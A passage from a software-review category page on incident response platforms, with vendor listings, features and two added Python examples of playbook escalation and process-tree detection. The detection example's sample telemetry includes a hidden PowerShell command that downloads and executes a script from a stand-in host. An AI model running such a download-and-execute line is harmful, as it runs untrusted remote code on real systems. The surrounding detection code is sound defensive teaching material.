Incident Response Platforms

Incident Response Platforms Overview

Incident response (IR) platforms guide countermeasures against a security breach and deploy preplanned, automated threat responses. Automated tasks can include threat hunting, anomaly detection, and real-time threat response via a playbook. After a breach, IR platforms can generate incident reports for analysis. Through IR software, incident response can be planned, orchestrated and logged in accordance with policy and best practice.


IR platforms may provide response playbooks designed to help contain and remediate breaches. Playbooks, or runbooks, are planned workflows that guide or automatically orchestrate responses to threats in real time. A playbook is triggered when a known threat or incident type is detected, and runs in accordance with policy or service-level agreement (SLA). For instance, a playbook may escalate the severity of an incident if a high-priority device is the one infected, so that containment and assignment follow the stricter rules for that asset.


Through automated orchestration, incident response platforms help response teams minimize the time and resources required to manage incidents. IR platforms enable remediation teams to work on a broader scale and can identify and remediate network events that may have been missed due to a lack of resources.
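The paragraphs above describe a playbook as a trigger (incident type), an ordered set of actions, an escalation rule tied to asset priority, and an SLA clock. The following is an added example of that logic in a minimal playbook engine; it is not code from any product listed on this page. The asset inventory, SLA table, playbook definitions, hostnames and alert IDs are all constructed for illustration, and a real platform would execute the named actions through integrations (EDR, mail gateway, identity provider) rather than just recording them.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import List, Optional

# Severity scale, lowest to highest; escalation moves right along it.
SEVERITY_ORDER = ["low", "medium", "high", "critical"]

# Constructed asset inventory (hypothetical hostnames). A device's
# criticality is what drives escalation.
ASSET_CRITICALITY = {
    "dc01": "critical",
    "fileserver02": "high",
    "laptop-jdoe": "low",
}

# Constructed SLA table: minutes allowed to first response, by severity.
SLA_MINUTES = {"low": 480, "medium": 240, "high": 60, "critical": 15}

# Constructed playbooks keyed by incident type. "escalate_if_priority_asset"
# is evaluated here; every other step is an action a real platform would
# dispatch to an integration.
PLAYBOOKS = {
    "malware": ["escalate_if_priority_asset", "isolate_host",
                "collect_triage_package", "notify_soc"],
    "phishing": ["quarantine_message", "block_sender", "notify_user"],
    "credential_theft": ["escalate_if_priority_asset", "disable_account",
                         "revoke_sessions", "notify_soc"],
}


@dataclass
class Alert:
    alert_id: str
    incident_type: str      # e.g. "malware", "phishing"
    host: str
    severity: str           # as reported by the detecting tool
    detected_at: datetime


@dataclass
class Incident:
    alert: Alert
    severity: str
    actions: List[str] = field(default_factory=list)
    assigned_to: str = "tier1"
    respond_by: Optional[datetime] = None


def run_playbook(alert: Alert) -> Incident:
    """Select the playbook for the alert's incident type, apply escalation,
    queue the response actions and compute the SLA deadline."""
    inc = Incident(alert=alert, severity=alert.severity)
    steps = PLAYBOOKS.get(alert.incident_type)
    if steps is None:
        # No preplanned response for this type: route to a human.
        inc.actions.append("manual_triage")
        inc.assigned_to = "tier2"
    else:
        for step in steps:
            if step == "escalate_if_priority_asset":
                crit = ASSET_CRITICALITY.get(alert.host, "low")
                # Raise severity to at least the asset's criticality.
                new_sev = max(inc.severity, crit, key=SEVERITY_ORDER.index)
                if new_sev != inc.severity:
                    inc.actions.append(f"escalate:{inc.severity}->{new_sev}")
                    inc.severity = new_sev
            else:
                inc.actions.append(step)
    # Policy: high and critical incidents go to the senior queue.
    if SEVERITY_ORDER.index(inc.severity) >= SEVERITY_ORDER.index("high"):
        inc.assigned_to = "tier2"
    inc.respond_by = alert.detected_at + timedelta(minutes=SLA_MINUTES[inc.severity])
    return inc


def sla_breached(inc: Incident, now: datetime) -> bool:
    """True once the first-response deadline has passed."""
    return inc.respond_by is not None and now > inc.respond_by


if __name__ == "__main__":
    t0 = datetime(2023, 5, 1, 9, 0, tzinfo=timezone.utc)
    for a in [
        Alert("A-1", "malware", "dc01", "medium", t0),
        Alert("A-2", "malware", "laptop-jdoe", "medium", t0),
        Alert("A-3", "rogue_device", "printer-3f", "low", t0),
    ]:
        inc = run_playbook(a)
        late = sla_breached(inc, t0 + timedelta(minutes=30))
        print(a.alert_id, inc.severity, inc.assigned_to, inc.actions,
              "SLA breached" if late else "within SLA")
```

The same medium-severity malware alert becomes a critical, tier-2 incident with a 15-minute clock when it lands on the domain controller, and stays a medium tier-1 incident on a user laptop; an incident type with no playbook is handed to a human rather than silently dropped, which is the failure mode to check for when reviewing any automation of this kind.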

Endpoint security and incident response platforms have traditionally been treated as separate categories. Endpoint security is the first-line defense for blocking known threats, while incident response is the next layer, concerned with hunting for threats on endpoints and actively removing them. The two are now merging into a broader category usually called Endpoint Detection and Response (EDR), the label several of the products listed on this page already use.

Incident Response Products


AlienVault USM
287 ratings
385 reviews
AlienVault® Unified Security Management® (USM) delivers threat detection, incident response, and compliance management in one unified platform. It is designed to combine all the essential security capabilities needed for effective security monitoring across cloud and on-premises environments, inclu…
CrowdStrike Falcon Endpoint Protection
21 ratings
13 reviews
CrowdStrike offers the Falcon Endpoint Protection suite, an antivirus and endpoint protection system emphasizing threat detection, machine learning malware detection, and signature free updating. Additionally the available Falcon Spotlight module delivers vulnerability assessment with no performance…
Proofpoint Threat Response Auto-Pull
8 ratings
3 reviews
Proofpoint Threat Response Auto-Pull (TRAP) enables messaging and security administrators to automatically retract threats delivered to employee inboxes and emails that turn malicious after delivery to quarantine. It is also a powerful solution to retract messages sent in error as well as inappropri…
D3 Security
0 ratings
1 review
D3 Security in Vancouver provides a platform for security orchestration, automation, incident response, as well as investigation and case management. Core components of the D3 platform include integrations with SIEM and threat intelligence platforms, a NIST-compliant playbook library, a case managem…
Agari Phishing Response
0 ratings
1 review
Agari in Foster City offers the Agari Phishing Response service, a phishing incident response system designed to accelerate phishing triage, forensics, remediation, and breach containment.
BlackBerry Optics (CylanceOPTICS)
2 ratings
1 review
BlackBerry Optics originated at Cylance, which became a BlackBerry company through its acquisition in early 2019. BlackBerry Optics (formerly CylanceOPTICS) is an incident response solution emphasizing fast endpoint detection and automated smart threat response, root cause and context analysis, and othe…
Cofense Triage
3 ratings
1 review
Cofense Triage accelerates phishing qualification, investigation, and response by automating standard responses to suspicious emails, making analysts more efficient, surfacing actionable intelligence, and providing an incident response playbook.
Palo Alto Networks Cortex XDR
2 ratings
1 review
Cortex XDR from Palo Alto Networks is a detection and response app that natively integrates network, endpoint and cloud data to stop sophisticated attacks. Cortex XDR accurately detects threats with behavioral analytics and reveals the root cause to speed up investigations. Tight integration with en…
VMware Carbon Black EDR (formerly Cb Response)
2 ratings
1 review
Carbon Black EDR (formerly Cb Response) is an incident response and threat hunting solution designed for security operations center (SOC) teams with offline environments or on-premises requirements. Carbon Black EDR records and stores endpoint activity data so that security professionals can hunt th…
Cyber Triage
Basis Technology in Cambridge, MA offers Cyber Triage, incident response software emphasizing the rapid and accurate collection of endpoint data, touted as more comprehensive than antivirus output and usable by responders who are not forensics experts.
CenturyLink Analytics and Threat Management
With CenturyLink® Analytics and Threat Management services, you get the visibility needed to proactively identify potential security issues and respond to them before they cause harm. And with our event and incident management and response services, you can ease the burden of having to develop and …
Cobalt
Cobalt headquartered in Montreal offers their eponymous incident response platform.
TheHive
TheHive is an open source and free cybersecurity incident response platform.
Huntsman Analyst Portal
Australian company Huntsman Security offers the Huntsman Analyst Portal, an IR / SOAR security application designed to integrate with the company's flagship SIEM platform: Huntsman Enterprise SIEM.
1E Tachyon
1E headquartered in London offers Tachyon, an incident management and response product, providing guided remediation and an automated resolution process.
Barracuda Forensics and Incident Response
Barracuda Forensics and Incident Response automates the response to email security incidents to ensure quick identification of the nature and scope of attacks, eliminate malicious emails, and carry out remediation actions to halt the attack's progress and minimize damage.
Exigence
Exigence provides a command and control center software to manage major incidents. Exigence automates the collaboration among stakeholders within and outside of the organization and structures it around a timeline that records the steps taken to resolve an incident, to ensure all stakeholders are wo…
FireHydrant
FireHydrant is an incident management platform designed to allow users to resolve, learn from, and mitigate incidents faster, from the company of the same name in New York.
RADAR
RADAR headquartered in Portland offers their incident response management software platform, providing breach detection and incident intake, automated escalation management, risk profiling and the company's Breach Guidance Engine, among other features.
Securonix SNYPR Platform
Securonix, headquartered in Los Angeles, offers the SNYPR Platform, an advanced analytics platform providing real-time insights with identity data, threat hunting, and other security analytics capabilities. The SNYPR platform combines this with Securonix Response Bot, inciden…
Kaspersky Threat Management and Defense
Kaspersky Threat Management and Defense is a technology based solution for enterprises designed to automate threat detection and incident response workflows.
Cherwell Information Security Management Solution (ISMS)
The Cherwell Information Security Management Solution (ISMS) is designed based on a proven NIST framework for security incident response and remediation that allows organizations to handle incidents efficiently and effectively, as well as associate risk and incidents to change and ensure security co…
GravityZone Ultra
GravityZone Ultra is a complete Endpoint Security solution designed from the ground up as an integrated next-gen EPP and easy-to-use EDR. It offers prevention, threat detection, automatic response, pre and post compromise visibility, alert triage, investigation, advanced search and one-click resolut…
Cynet 360
New York based Cynet offers their intrusion detection and threat response platform Cynet 360, which monitors endpoints and networks, correlates and analyzes suspicious behavior, and provides automated remedial protection and manual remediation guidance to contain and eliminate cyber attackers.
Proofpoint ThreatResponse
Proofpoint Threat Response collects and analyzes threat forensic data to support orchestration of incident response.

Learn More About Incident Response Platforms

Features of Incident Response Platforms

Incident response platforms may offer the following features:

  • Knowledgebase of regulations and best practice response plans

  • SIEM data ingestion, anomaly detection

  • Correlate data from SIEM, endpoints, and other sources

  • Pre-built customizable standards-based incident response playbooks

  • Automated response to security alerts

  • Process tree & timeline analysis to identify threats

  • Attack behavior analytics, for real-time detection & forensics

  • Access & credential lockdown, network access analysis

  • Isolation of infected systems, malicious files

  • Automate escalation to assign tasks to the right people

  • Service-level agreement (SLA) tracking and management

  • Forensic data retention for post-incident reporting, analysis

  • Remediation planning & process automation

  • Privacy breach reporting policy (e.g. GDPR) preparation

  • Compliance report issuance
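Two of the features listed above, correlating endpoint data and "process tree & timeline analysis", are easiest to understand on concrete telemetry. The following is an added example, not code from any product on this page, that rebuilds a process tree from a constructed set of process-creation events, walks a suspicious process back to its root, flags the classic Office-document-to-shell delivery chain, and produces the time-ordered subtree an analyst would scope containment from. The PIDs, command lines and the 198.51.100.7 address are hypothetical.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed process-creation events: (timestamp, pid, ppid, image, command line),
# the kind of telemetry an EDR sensor records. ppid 1 stands for a parent the
# sensor never saw.
EVENTS = [
    ("2023-05-01T09:00:01Z", 400, 1,   "explorer.exe",   "explorer.exe"),
    ("2023-05-01T09:01:10Z", 512, 400, "outlook.exe",    "outlook.exe"),
    ("2023-05-01T09:02:30Z", 640, 512, "winword.exe",    'winword.exe /n "invoice.docm"'),
    ("2023-05-01T09:02:45Z", 700, 640, "cmd.exe",        "cmd.exe /c start powershell"),
    ("2023-05-01T09:02:46Z", 712, 700, "powershell.exe",
     "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://198.51.100.7/a.ps1')\""),
    ("2023-05-01T09:05:00Z", 800, 400, "chrome.exe",     "chrome.exe"),
]

# Image names used by the detection rule below (hypothetical, but typical).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def build_index(events):
    """Index events by pid and build the parent -> children map."""
    by_pid: Dict[int, dict] = {}
    children: Dict[int, List[int]] = defaultdict(list)
    for ts, pid, ppid, image, cmd in events:
        by_pid[pid] = {"ts": ts, "pid": pid, "ppid": ppid, "image": image, "cmd": cmd}
        children[ppid].append(pid)
    return by_pid, children


def ancestry(by_pid, pid) -> List[str]:
    """Image names from the earliest recorded ancestor down to pid. Stops at a
    parent the sensor never saw and guards against cycles caused by PID reuse."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def office_spawned_shells(by_pid) -> List[int]:
    """Flag every shell or script engine with an Office application anywhere in
    its ancestry: the macro -> cmd -> PowerShell chain. Checking the whole
    ancestry rather than the direct parent catches the intermediate cmd.exe hop."""
    flagged = []
    for pid, ev in by_pid.items():
        if ev["image"].lower() not in SHELLS:
            continue
        if any(img.lower() in OFFICE_APPS for img in ancestry(by_pid, pid)[:-1]):
            flagged.append(pid)
    return sorted(flagged)


def subtree_timeline(by_pid, children, root_pid) -> List[Tuple[str, int, str, str]]:
    """Every process descending from root_pid, in time order: the incident
    timeline used to scope which processes to kill and which hosts to isolate."""
    out, stack = [], [root_pid]
    while stack:
        pid = stack.pop()
        ev = by_pid[pid]
        out.append((ev["ts"], pid, ev["image"], ev["cmd"]))
        stack.extend(children.get(pid, []))
    return sorted(out)


if __name__ == "__main__":
    by_pid, children = build_index(EVENTS)
    for pid in office_spawned_shells(by_pid):
        print(pid, " -> ".join(ancestry(by_pid, pid)))
    for ts, pid, image, cmd in subtree_timeline(by_pid, children, 640):
        print(ts, pid, image, cmd)
```

On this data both cmd.exe (700) and powershell.exe (712) are flagged because winword.exe sits above them, while chrome.exe under explorer.exe is not; the timeline rooted at the Word process lists exactly the three processes a responder would terminate before isolating the host.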

Pricing Information & Availability

Incident response is very often offered as a service by cybersecurity outsourcing specialists. However, strictly technology-based IR platforms like those listed on this page are available to SOCs and in-house enterprise IT security teams. These offerings are often part of a suite from vendors specializing in cybersecurity software, in which case they may be bundled with endpoint protection and antivirus applications from the same vendor. Vendors of IR software will boast integrations with popular SIEM applications or other IT automation applications. Incident response platforms